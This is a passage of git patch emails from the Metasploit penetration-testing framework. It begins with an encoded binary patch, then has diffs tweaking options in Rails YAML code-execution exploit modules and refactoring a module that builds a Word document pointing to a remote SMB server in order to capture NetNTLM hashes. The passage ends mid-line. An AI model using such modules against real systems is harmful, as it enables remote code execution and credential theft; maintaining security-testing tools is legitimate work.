z=<&f6k|hJvg?%(l_1(jE(bN%-qZrCamm~=D03aNs$FBr927s8bp1}qpDOLJlesDw_ zl(%5lfFIb7`(ZHhu_Fd<cHPe7Mp;ALHv@6<-g#cRLW(a}F`eekx2r+!>A`wsMLEy+ zhv*}M?rLfgLycB`Gt?M0)_`i^U3ceDy;~udx1xv-Wg2Z#rGyF}=@LH8=qMby5I(Xd zeB@5}$cgZg8R63=2jL^F!bhHkk1PsbsuZXx^ld}{GAevzUHB+V_)c_Ea!z%D_e;_{ zDHr+vBt13p5@51(Yl>OWWxSEX9BI2yCykE|{{oLq)?0#NNU|QEMHDnj#G>=L23;fS zhN}tX4i%7Ed0c7<g%09E>Kx$WK9H=3T9u3LD`|R+l1Y5TFlWW?vWWSRPbnyT++&I* zQ8_1+J7}bm${iPYxeUD=($FVE56h#CMn_C)BNTIDUd)Nm<oH{pAJtdH{B4H*lLF%5 zCG<fqikRdbJ1~m>gB6Of!5}h#od^tZPZ35(Ru@B<_Z;KJXb5Jm!RV&0EWmOSTQKN% z-@wry6`9vqBb<z}0MCYoIGBtB3vtIvPhymnW@3UNd$CbcqhW({qN3ra1vWTGLQ-@a zrAg`qBCUKvNqrBJ`erG;v`8wQ1{#JErX*;rI!wb-#5Npp8YLpO!pg;L5wQ<4w$&3c ze#uhsh4e{8jM-U^;-Gk;Izh+4@J&EbaO2G?g%uYOOrzgB7#T68_UwyVA;Cfo0kxk} z$fWjC8u6iRV6uMZ89XJmIe1EHf<gLqn?^x8&`5mbnENVZ_^cocGRef4`|4!DCK-*n zEnblfA0~t{g*%Hf;5S5lpm+M~B0bDe<zF`MRYo@#3yaI>*X?46&7JMPlFzNGmwgjs z7L47{1A3JKtg^<SS7~Kf&tuH8GUzK**I5lG#`RkCUR!5%a1M-q)}wul1{!NfI{=L| z_L>8VVNL1LOk>S?vp8FvyKOc7TQx9>6)_-M2{&*Y437vFDd)G9YU(|0Q5eWr827KO zheZFoX|5<~udm4Togap{&(+jBDsf<j?D-Hs;e#c7D?S_I!ZVt8s;wuMhtvuEh!szN zAP1nB0@1{R@E?p;?x{h+n7S3k8xh9~;;kTd<r9a1I26QTAPxs{VL>b>r5<9^QAhw( z0i$3v`*6|xgE2phM3aIELRO4e16m8d1-=zxLRD66ib_uGA_Z&efs!ddGGX+qIJ!6D zZN+|g8h9%#on;V5{&5|>X<6bRr@7G(8pa4NvW8d9V^S5ZikR4;-&InOI_v7`BA;?D znt)y>5$UZg$Vmf^Ovjai^$_}t%FAC=UjCxY{1LPaD~ocX<$pO8CoHkD@}N?oCD#N# zi3rI~wU>xcEMeVs^^N8Qbc34c*9=oa*iJVWw&&XwU&xzv!NGrF0SF7*1|HStF1kzF z`02dI8Rr*;IW=4YWBfq0kw~^G?5<uUugjsw*Yx;CSezV4JHIie)e4QwQN*wn^jN8} zRkY_TLgcm=3}h1odtWgON5o@j?<<C_(`ZQ?EMd52E{3`3u~DPLD~0LEN{lcV#6Rt> zCnz8A)!p^5)`K*%Q;|j+WBVwUU9j*({;$G5g&)0RQsqbQ2ZRBNgJNZS2wg4AQ&4ok z7)d@bu<#ur3{?#0(eLOdr3s%>J@i?Y^f|Oh70XvFs8H;0i0ijv>%8CX?R@!LHtfLD zIz!Av{IFL2)PP(UyF(Cc%V`R>WyMq{Sgd%-5XDe3M1jXJEPzRz=8MIxX|!TEg8KE* z|I7L|+r6r{{;8s5^NM}-VPxfnwyF2`)%_53wy)mEG8ZXH@2AHrpSrQGUFm2;@^z{{ zv^h+E{_<8Xa}l8kN1BC?)CnI66n?%13m4vLSu1yYNAuRh_2{fI2$Z!x-y+3Wgvmxj z_O3q08;Px?Aq#ohL}8=dtA^|ESd=kj&L^Gkz%3U1+zY)T&mN&y&Lj?E`e12ga+sv< zlB;AWHP3r#l{}i?7@;o!t4S`sk}HoE%UDnBQ{*BUt!L~@i)31}=WDvSSueS;q-@E4 z;7c^d`C_YDX33hz6sFp-e5E-MDhhmJ)td2oBlTogezAN7K8w&-=M>-(na3m2Oc<H> z`qbp%wb<>C#qNOoG|8gImKM~s>};vv=~?WG%wqKk)h=4>j+O&2rNpz?&HpfDkY0Wm z8<x$;1?b4c5s`_3_f^QI3$leKnON+;A{ol;E2N9g>}-Kgi(S&br9br7;xCO~$o34l zF{AYIW?$8IEPjfyx8Ar))%l!H^s=t0)YzeV@5g8tUt=?9Se=PoeDb+Y8ZA~fM`LqQ zHn6Cxu`dYsOM1+=<FSAq3rT<REBXb66?AkRsiX5_-)Ll7H=I;t{MZtDNE<y-Y$iH9 zvbQtSMWN{S{Mbr*pyTsnvd>#X;=cqE|E*)|byM!Qk-D~U+S^B;8g6dz_k`S^5`fTm z$%i2DJDeq;V|r28DquUI9E0Nt6dzE!n|6M_ccAY66hLo3(^{2b#fq-23qL(x|HS>? z1pO^b&?jsxiP7*t4}cLfHocqNxgQRJnl@Q)8wJ}n*y5o*b8G>U!b}fZ_}wIhnI8P3 z$$G3loECZ>86B2Zy;wH`8-3k`HHWj4_0YiX>}>;@E(nIbOM@o*bg^MDkDQ`UQHJy7 zQ}nw3x;7ln?@!U+2F9CH^%07TWO0Svcc$uV><wr?lBx(9&?KMCXOfSogpbq-AL$T2 z(k*->4!(}&VQSX!YjgFgRr(=N*kQ-lu|oD~#{g>}q(8!C%T70ST&$R4$X!XY9w=05 zc(-|a6KKV(o2Mri(2A*IQWU}zLfQc?jL%IrfoNhuHi1Z^#__oxU5lcZjW-@?lQRU0 zTFL@_F(^n)VyV}o0OE@=qB9sti6iOt^!i*sMS4B;=j)%k@`%;lCUG~lJ0m+o3XWZO zfkw_~K}>eqKn#ZU#5-1tDL(62K#FAp^Oqe<e%hv>Xr`jWnpU7#oOx+;if)TKyiZu$ z|IO9%-?+{I*O}lt>;K}44v361Qh|vMh!W-LxAMP{4ZWl+C>w@@k3|PG$s`lo0<TDh zJWNIeD#nN(;nTK275Ma5n>ShL>3AkA)O}=cqvqD`!cQ&JWB6OKu%Ea!N5?J9H19IP z=gklR_p!ygM=Sdn5X}zjpOt!PhrleoE4U6Xw^1+U!p%cr>;OFu(q1WqK4CO331f%p zaRm1Zv7_|s7@-`e#|bFSKq^l{e5uY|h=loPo$MStPm=sU#NpUNq|;r9UDDW}M1GmT zSA==O2vegwiXFAH@?q=-F}<m=TMpDf1cjL!zwz?rE`|I>Jnrf2KKTzc_K-(!(lZ*P zca6fUV#A3h+W3u9V2DS@ttXmdcVN!@x2`zARk1?5inu?(dX%JWc%MW@8}V+CvX$Zs z#VbB%lYSykT|3_W!)86iR(3j@YEW%3@U<t>7UNQASkMEy$p-f2+_cfK$RO=2nofNr zO?vt5M4``8>dHycYdiId7R=lD_?>zgeFm9XoC({8+0u9zj17v(nGVBK(#V+lAHCSW zc2Tq3=>RFpEZ*vSy_>R#Z~b16!`qqf^)CLi6exD1slhmsq0ELBI&2zm^PQ!@XwEmv zVnbPipv>Pa;oS0?E!^GkM?KKlRN4v)ri7!q6{e0A)qW&?t7yHdXt@+FTdoWrhxd;~ zOP24Spy#6I0vf((zaAemRgfc_!beWw(=uLe1<d9*_v<B<IXvco9+Np2Fxl_KntI^$ zPRUUOgc7Ktmy#O*vvJ%}hY=`#9JE<PD_3l7%?yy{tL*CN*L*=6hjZBrAkioB5k3<5 z&UTkPsFzj2=AGa5(fLVG6U-#^RyJae^fh{~8jxH-U=LEMj1FR6_^`ebv_Bu#>$xZi zbPZ_;^fX97ucCT3V=J(4VZq2`gBX1k!iJ#J$;Bo%b)Qyj$*#pOhBB3k@AQlGy* z&7uSXT1zCDdPpoOE&hWxuuigvB)u0o9fZm{Zph-3*W1D>dKi#``YSWo2u7O(eW7o$ zsZI$%{U&;@9o1_glZ}pI0_iE|!f5eQp}jcLuvMt5(--h$BSmHdy(cNL%T#!YZM6Ix z$nLa|I0!6<JR9U>pMx)TwL2*_;3E{<RW@53HKL6Fe`F{{ko_R^;i(k8qPM<!^peky z1^I}hMy^*+1j%J(8B{VqrIwP~c0IGKM!KXS-T$2%Ew2#B{P0AP8xrhFMwt-(;ir@{ z{1-lQ25yynP!>{!f3`3$pZs#_Uq+US`?L9E*rIR#e<C9XdqqC>LHZ|dsz61Me<UKH zzsk~sC`<nJ<PVN}2D6eU^vdR-G~l$}+Wh(3Is6pklbTW3pYK1XC-E~waWVbA)B19E ziA#DDInEW~-}~}$m-Q?cbX#Ld)jO8vzp<p$y%N_0(!4j;ocBVR+m073^JCe!xQv2^ zEfIp-<YO6@`LWEck(R5_g^e}$z=I_YY*oaPrQle$jULigMFh=#V}%V%UiFHe;QEMk zYWHjG0NJhwOc<fW3V)PFBWXGryu@INqdqX>K>mKQ#vdt+QDW~qK-i%m9|-T04}=pW z62LolXoBe-BW||X3Lh@E!d+r3ye{p%pXKMT=!e`tUDeN9(!L-=;h)n3W)lr82IoSR zrFGA~UApH>3C57Iaf~&llwb^vI>N;7C^kY2M82bGyL%)(Xb0RJrZANh0)oJy>^<5C z2Xr`tzK;u3=T7Re5vZ9jsnd)hb866%lG`4OZs}7Mtc=Ut(FZG&#mMNe;W#eRhE)OI zcSmn*`4Y*BxeJlOWU&?Q9(z~!cLX6uR3TN&X30mqywWW#Ciz1VjI;<J=@&kd51%$7 z<ghhPnE%b9HRj9W0ooAthzH~tMw4BP^dMG+B}j#hbJuyQ_p~V3eSV?mW)g{%2fS$x zdy_Ej6&8b)Lkg4$Fy7H{A?#MNaWf~`w}G^gVz1`PBgF{eiERa@0%UHR^ta_nBI+B+ zQsp>AR8SnyS9V{N4cY(Chd5vX=D(gSSo4_D9Cx0`0_uXv3gQ5}YEMR5ggM@PvdBEL zNHZ;D{6diNo~k{qK*23R%u6vNTvi~~e<R0dq*(c0)gGCdU+yb0`mMrhCs&Zm&c`8R zM^7c!{NtqQ2qN-Kx$~21!#GY84T60|IRu$BwJ}ag7+!@8r46#LF~U<4#RUJ=$-Xhk zglPX2$xs;<Bgr&_*a@FR`w^4}{1uZPItlq#m$&t?o1*<$KKAhF0GiiZn@-t5g+Q(p zUwFhG%qPaf;`#le_Rpkfbwa#-pj5t`m1v(Q!ub3|`!4ybcapt@V5H0qJl)Y?bWaXT zl#CiA8o}<zN%o$mkhWWCdrMP|b6XkvGV^Dza`qrqu-K%w41Zmr+phCi<RpQGyMn#F zi5ylD)l48ys8we0A|R40A>(VCY{YO^eS5k)w~~FNL>m}6>iT`4kTcOX656rX?LqEw zRqWSI#zU&v`<X+<m74Z6Q|~Ffjy+!f<kjlgC(11Et7q>nizchS9Xg#tEZw_-J;bCR z`<lIi8M?Ev{ST9VaWnf^iCUt${aq9O<?HrlinwuN|Ac1qsQOLdtDD)wd8afZloxMl zpCL(hwzRi1Nn%^s>-ovhUR~|A{lsD0!;>3^-0@}XjxRs3+@9*bGSL3QS0Y^>X|G}8 zmzZL2VE+8*3wvEZF&u8p7;%$le_=1_e!AQqV1ffSgR`V>^NYQ_pGacLs*wX9Ba+8F z<{sks<%nIAfZEq*bbkuKQvu*pN*GqRamj8oIfUM`S2usQRUFODpSgt`jpfe`(T?ge z8y%;;NRI`hSYPg{W)I{03ppI_erb;KW?q(MIX;$k>Ep6>9qzJqopopVG-@)S26vru zmiK8$zc!z8Ruw7dPfs~<G<IaU8ocspXGs}0;Iy-n{I&YDvyS}r_i1M*VW*3CIOA-p z??<a>v+LIDeBBvm1Bs!Wbyg9D<r<Rk2|shz8OqzAb!JH5<g?ED^4AIc5+&95*Wt-u zrZMP;Wu9|Z5yyOZ|8vd=^?Il2=f)P{OV2rjWathGt=W}Ar@Ol9{1=B|NJzkWK-TsV zklTH9ehl}&#x_K5{<`71bi#sLy5Qnv(-zO1>^%brTPev0Tz3Y=l0x<AoC!5uK2T<d zqdhCnUrzRwAtEL7&YPHF^D;vogCjX_%*De6=5-I|{jB+)4FwiCZ_KkJ1ZJf_Or9N= zT&wmru*i91&KxB$KlNY+j&1n#-!UtU6PPDGm=_O~zq%Cs$a(WTIUbk^Y0VlbYA_Zr zm?|+Uf~8kCeYw?&H3ghE!4H!J>klrN$z9a>+q8x@bfR$Hm^-Em%-tT$kH&Ss<V?pr z04~;3rtovJ8_or06py&*3@l3h!ue~TZ(oDNkSpSaIsIqGrXRQ!I(_x`8t-+{DeE== z;G#3a$8}J`c<x1Kkl^#h$x44tE`&XQIB!16X%qJeaAiFVxC9=*-Y~-}L>XpydkX*O zjtCFqf2l^GsMPgaeYl<1_|qBcV}D@MoV;Yl`^Nj*zB;NhM$S9lI+&Y_^!L55@$^4E z>96u9;%NPk2^;xH<L?6|^03dcw_L|^7$M+1I$u;IIoZ>n1ONQB5WeM4XQ0f(0q{{% z%krClI*W@`wrzcI1dqP#3{_iI;N>nmlVx-7d>MEtO?dMw&R|$vS8TjUtYPTX70j$# zt^pr;1r)rwgde@^3=*J<FTxE88rxEWqOX{sbqx!bk)T1X36v}dJ}Gl>xeV>xRuZi6 z5Ud*12v_h>G)+55&^-@m@!pcnc;_1cRp}%_6|b7nyk5<6TY_4?EkW5HP{7T^3<>Jh zU4o`|!3E6wt~zDDF1<hZsDzK|DdB~#nOyC|V}6jJIlU$5yB;9za1EbF^p1V5p}1B< z{~Sr=pL@uL-rx4KB)dFFg8sPX3>Fz*-e<@d33`sBp+r^ux(NzAKYNe_g$$RV{vOc% z^D7(@l=hJXH5;breEW4X3(ba4n<wG5MoRc|59y)(6>dsU+tCs<!UfXCH%!uDJ$j9h z@B!l_eBuo=L61Ls(nf+l881OA#)9-DNHxm+-TF0n+<j-5I)9=BN8B_ihaTNjLQ-y+ zB0-%2iY1~#v;KH6iTV<_aIY4;2X}{1fh@Ucmj1q@muE^YQ|C$0El&gwCw5sPL5shX zpt85jxUK!F?UkVK7D~{E9#AEA`~wL(oFhTsdqAI6n7>|vZY-7{{~SdRF4+4~>Zc7| z)>xuhmP@qex6OEuwt0KI1VyZppsLGIS_^KQ1^t$lpO^5GYb5-vhxFH>Umua6`s*a9 z_iB)4+%ZYNpY`}d3Ge8Z@IH6U;{1>Q((%2~ca!rj&Y_$6!aL3+QR~+4`U6|W)NsPT zqtIYpWi#qAjgA8T;qw`=YC-VKof2O2uK5wBt-X*dL3MwSpz$8ik(+y-NKl8LC1}3~ zlv;VeO@aphDnVg?nGCh4re<b7-6KJ(cOfm0RWmJHmOO}%q+jjl)BZ9$jFu<H-jku5 z4oRvr`xNbeeV-p^Z7eI%_8*aGrSF;Xve-YuCFt^T2^tQNY{t{>p&36v#k23DXv)W- zBd3r3-j^qQCB>)bBxv<1q}1=e`B{#%I36kCUtN&!Cil(Aq8uHQBxuv01d_ephK#Da zW$6B^lHe2wM6-Ca`@F1U7!=4A_G%WFZ%EYm2PW^EKCUgi>H~bNhqoo@U4R6aY8@jF zjl$f7oHv()_a!RziUM`T!N-+mqYaYtM*Z|}iMsj$GW+6z(}<(O_@;CB*k>AJ<h=3Q zswz)==u8r5Zw?;4H5@49ywN5*RKCEbM({}wJ-z1_4^ix=1NfcCDE2)Moq-}{^J^Zv zI}_EJoHvUVVG=dyky#WqyY{WlGajKR-j9@^FTzyKoZBJM3+vx#h?O_#D!s(2QjEm! z6bbzI(T|F#&o(_Ws|9e$c}G1kUgBRt)G<^Z<ySwdJ{c(_=Z*T5cYf>);hB%kl5Srs z>A-qmk@LpfnJSqM1*)iV%YwTW;?o{GLzR{MHZj@eVNzmEskV*5fSfmzjMBtJR<M03 z>5)9<Z<NQ{a*}nUzs*$mAKSg~3Fd6%yczsnQKEk4LG9FcUb{QcXd~y{r&w$7AOChH z6{P|=Jo{nspHNQZycwpp#sx|XH?_K7o4REx$xE^F}&NhjxxT&%syE53<p(dUWT ztQI%#W#idToS~NXom8&$QG@xaC(aPT=iVFIw1wb7&a*J5){>K5qKAq5_=z(};O5qv zuzUp)M=r{%N!fb~+z<{Toj3T$tm211_)lHWC-r82yT2fa<XJXDHiuwK>n}$KGDgn3 zjMfhpxIug%CSM{U!P{3ISdVs1&KtMy$0{E=S}n|rJT)_)xn^nrFZmQ-u+0SC;HgvE zf#L(6qNV&gm^XjnjO0t6dS<5EDfp{lGI;M0i_V{ek(}}QJp&Bmh9If)%o!|$J5X>F z%o2#x3<QhW;I1A&^x~bLA=<AoOCZn%59m}~dr=8`iU|UN{=(c)P|fQ9xP}C^m>@x} zaY)1X=V(qeTfdn5C<5B)j9jeO7g#n);_rWs>Pe_glY7qp2jxS~8@1Iei5mUFM6L71 zqeU-(M$Q{`${a$?5DZ6e`@sbvG6|Aj!usuV$#63mnv>%fD3fiN5+HXob#r<@GscKe zN3EB*tJYYwnH{i}q_ocL1IXcx5<SNV5@oSFb+c{e03%c_wp9ZDGGxv^>2UjC-|8p? zI8s3L{N-eSu$?d?cs0ccj3dSidTttVI*~DQ-m8N|=EKWBwM6r&ShmVUFHnpKpDIZ{ zj89AO3FbbRopSlnB`2XYFBxlu`aDjRz#tx7%tzy~7-1!82^FM~nI7nWBFsGe)!2St zkXovi^5M-gd?NYkJfa;$)VZvO=&ow!Z%h2ex})o%CBS*t?lBd3g2hOZaW=6~az}!E zVRiHjE{hQ;zSEHfts4)-3Xxoxr)=P3?KhgQu^5Sx`~=9=yW{yoga|si{kjC=Bj?e+ zCGwo?<CA$MA0u91wH|*gIRrf(IdATj7xNK5Ca)%AcDHPW_{n)=ja$LL2bN634IiW- z;9IU+O**<Zw^jf)0O7pTFn1$wY&Fv`-BqsWTxf`r^IoU<|H`LYjpE|ARKCp$?ia4| z<5nXnmTpyT{%A%66}6X~cfp>%&SPvQ*77Ye&pTGaDiAKztNcRl@oqLFL6k$@1*{1# zV=c+xOMxYGc)*4<v~Iy~+RU_9JzL-X1=<-o?;Iwz<|Q-}i*9E<4=_2YWhxVrll`y_ zAEX&^A`Nu4WGVF9<cfKvRPWC_=|()S-rK721!p`x*e%V7P)72Ox{*N2r?Q=iizm;A zqoD=8M^xoR>nru$#wuKdeluM1!e*4l&*>2IP|JGh7RtQXbF#BW5Png*k`im(Kukgj zf9~&{+VBB}5emCXtL>0)!dSbEUtHHl5VgnxzQ%5p6#Ts|Y|G<LwegchgjIy@Zwrhe z)}38<#uuhB6E5BhHJLAT7_q!RFa^`EEC0AM9fd^>-!1PiCp-Il-rRvy?R1!paOqdO zranR)C+E%d&QF9I&Bw-=893U$Mj4Scwb&jB8jUVb<XYT1CGs|XzXWY8YJ$Y&Qv&q- zkOWx`6BL}L?34_99+jY00Lco~$3TVp{e%o&oEQ8Z1y?&GgCFMw7xG2$vhy<d^l5y+ zX1?YJq&uqyRAY=>TwX~~0f$^7{33jguMsH4j=5mt^J9XI@f}~;g87|ToB3r)ekE=U zSX0OdwM<F1@#bZ0A-uRBl1ngN-Oq@yY|b#lOWBY^3K!Q12%1YJO&IPI(D<$hR2M=J zcM1pu|FR~6Pa%_7+$|trl`05Wlw9i&o%O?98z-3By%HZ;2wj0l#>zrS#<Z#?CtNZh zlOb*v5S+HwFk!{~JxQ<T51PxhMR+jp?{5mD#B~E_{SiaLWWF!}6`g9b{5U5;qUKJM z!PLNHaESl}SDYz>al5Om8@@MQ>&peBA7>M&tf(>K9)U9fVBhR>3XS6#c6<h^=R7?S zpW)ILe1>U{mBPGhpqZq(t;#p#FM>eRbtf+oWJK`Qfo3Ga+O`1Y{vbiHx~+*>mx!)k z_3eix>64!co-SkR3?^!w-I9U_c`~w!g6Hg&!R6vS!T(V3#RD=}tcNJMWT?9bWX$Be z$KK4tgj$$?6l@ODTFrrB0cgGCyyuArv0^HzYQg-6U{7o(gYjJ=kqLyG^GAwq!K3d# zo``l$&YQ=h0Fy_{5VKT-RZkkxEn7k~ejq@L^jh~4J7MHgpqvRe$uD}yNBd6cBu91J zY$lVJ7HR~E83$SaY>K{xoc9=$5F>Dd_@Gd;JG#)Uw0aI%CWiqp?=L5NX)XSBs1YNi zlHH#@`@AJGMUHe&JbyXa8|!O~*Qlq(@jJCO2u9G)3kot!=Yz<}C411}=VZ5d%|k)G zr|1(WPHpi+We9)Cc@KA=cjZ&VjD(`pf)4G^`RpeofSmW#-{=RHYbI$S{Cb!XB#`sW zgdtNeArF$sp}br;YPD#auZ5#lw-}?b=?lvT^L-;V8($J;c2aZq%qVmTDJSPW(%W<R z>Ton~(J)Sfg(dlGjmLeh73HfJYI4vMHC$L>p@Gb@d5J(M&SL|x<{(0{#uA)}11@k$ zUIo>7g}^P?`c4-{E&uueUl@T#`O?5zG6FE)!xEM^vi|zxfvwy>8troGF#?ql1x^ME zI-o(2LnX=k%gGKpMOd)~T6}6GGPd?_jW_qvLwLqRWQ-*7B4gsbvFN;JK(sY2(kLc^ z#c5*-rW2P@Mi{>xY1Vpi=2#G1Lu~=aC|)hfED1VxY{6y$Iq&6Uh*RJO^N~@8+%o9< zt7|fhD3BqAml}3cSWgirpZITObh!=`6_So;LI06-AYb~7Rcm@Ef{S>%xs)QP5FHx= z&|Jk*wLJi$;M9{L2{3!k$ay!d$k+MgB1V$P|J8sSuk-VTQRw!Le19~Gb4oj;C4UlR zMB`fx=ptcz?S{FG>x5vKt=$)muiGcU2o_PkbPlJ$w|cK9F(@Ufk=-A<H)t5-ynDKz z$3o~hN{=oOeREm`spEN{7$a3ASm@6$h(QIdGErcM@_jL$3CqPs&GuuaNY1-cEA=&3 zVvS<vzz_?b6_-#*2<gSj0Y+%VQWvInSk9*bSw#2csgE~_&PyG+N)p@xfynLKbC33W zfsabgJGMn@cwC&xK&a0)j|1BiTZln0{|NFuQ4qWC^!`afA&~Q)Qyf2yDtcLu;2)vD z1@7I3iRn?mBj=4<_`Hdm|8YtdMLQUL(F~{0BQrjd!uMS^!<${iho%{-h=3HOj-vY^ zhlN7kUru()bwLm-W~Y)-R6I(ss?IAwwLpe+ppdpnd|HwbL>dR?$heJyOC`(T8}V2( zP)CyX#iaMzAO>>YGw~(GBx;=mBVID@od6E?ip$^~iT1+0eS+ED9ZmjcHVp*iyx9b& zNc>4j*md?z@~k@}62YsNfCcl0iH0;s#rsgOZ+RjK=3gWl$zq<|En?n)o(f~+yoZHu zd}<PE&e<~dkOIt$B!Np%MdA{{TO=9LBCB3H5J;!z55-!UP)iG}kZDn~j{!uktOo^t zPWJXHGFe#_?eTm{F;7lXlM&gqsssz-(340NY`l~syx5$qE>WQ?AyMCX7W2q6xA!i) zBDExHXfe+xs8S4(O|2_~dlxe@<(HXH!8_{9;Jw9+WRZrfTK3D05H~sRV!PZ>qIRlh z59L*hd$Q7`IM}?`NW$*agR(^42mW?d+w*6^ha5H;^Zs(O&o|;biyO5?jAwJVF8B#8 zo}72#1vi#lCpEAq6ezsjDTpz>nS{+tG0ctsJrvxtxeR`qV#JGT@HA=C#M+3NoOgbj z@`Y)rFuycIb|}dLef$Go|01X{<mACgnd+QujA?|vIMt8>qK`T)$u)pQE+sE(^v&zG zl4;ofI%<3VH!qon^v!K8VNfV3Dstbg^P%5@z=B+c7n`1MO4RjfMsa~U=TMI~ef%)d zfh+EX`b!&$3I&ZIo{(+?2z+<c_YT}c$;f%*2lXg`KfkNp%15SqzUS0*B(vSn0tg4w z&Hj1eXa1qjd?AH}^Um`0F$M5<q}Xk|M23f9^$ajP_E`ahQ5hz~r|oXlRgpS!-V75L z7QjCNd|7Aj5U+l)97gR%<hE3%$*c8m8|VLfZZ~Z!fIlJA2r%n^CU_~o<-<yr&gkFw zoq}6-)Y;{!*&x&2rC9kyJ}s|M!o#<53Gn^kN&y%&aO4-6eyd(9PXT)K`tD%?{2j&d zMXs0d6yQH#Xi=>WzOw|*#a1b41c)C0S>=w*fr2CF&8&5hi95rCYfGr&`1gpH#F@C) zfh!7TRw+bxBU1!Naj5(FroUV!<90{vY=U_SIq$*d^(qd&Da#S-rT0O_7&YTsr$V!E f;X0i6-1c+>zP*%@=vP!Js(jZ9s%Gb$sNDYpKbr&S diff --git a/external/source/gui/msfguijava/src/msfgui/RpcConnection.java b/external/source/gui/msfguijava/src/msfgui/RpcConnection.java index b1b7d2c2ac0f..8b754c1871e3 100644 --- a/external/source/gui/msfguijava/src/msfgui/RpcConnection.java +++ b/external/source/gui/msfguijava/src/msfgui/RpcConnection.java @@ -260,7 +260,8 @@ protected RpcConnection doInBackground() throws Exception { // Don't fork cause we'll check if it dies String rpcType = "Basic"; java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{ - "msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"})); + "msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1", + "-p",Integer.toString(defaultPort)})); if(!defaultSsl) args.add("-S"); if(disableDb) From 03a9723dc8bc03943adc8003b8e4de500a19c7e1 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 17:36:02 -0600 Subject: [PATCH 284/421] Update options to use OptEnum for HTTP_METHOD --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 3 +-- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 3 +-- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4066d047fef5..6fafba24d9de 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -55,8 +55,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) end diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 8743f76106cd..e5e5311505bc 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -53,8 +53,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) register_evasion_options( From 0f46ed72e1359ed4ac133410725a6cb153ae37d5 Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Tue, 5 Feb 2013 12:00:04 +0100 Subject: [PATCH 285/421] Using snake_case, fixed using tmp files, changed errorhandling --- modules/auxiliary/docx/word_unc_injector.rb | 314 ++++++++------------ 1 file changed, 120 insertions(+), 194 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 66c5325d38cb..c234f3dd8e02 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -22,7 +22,7 @@ def initialize(info = {}) If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, - 2007 and 2010 as of Januari 2013 date by using auxiliary/server/capture/smb + 2007 and 2010 as of January 2013 date by using auxiliary/server/capture/smb }, 'License' => MSF_LICENSE, 'References' => @@ -40,252 +40,178 @@ def initialize(info = {}) OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), - OptString.new('DOCAUTHOR',[false,'Document author for empty document.', 'SphaZ']), + OptString.new('DOCAUTHOR',[false,'Document author for empty document.', '']), ], self.class) end #here we create an empty .docx file with the UNC path. Only done when FILENAME is empty - def makeNewFile - metadataFileData = "" - metadataFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" - metadataFileData << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " - metadataFileData << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " - metadataFileData << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" - metadataFileData << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}" - metadataFileData << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" - metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" - metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" + def make_new_file + metadata_file_data = "" + metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" + metadata_file_data << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " + metadata_file_data << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " + metadata_file_data << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" + metadata_file_data << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}" + metadata_file_data << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" + metadata_file_data << 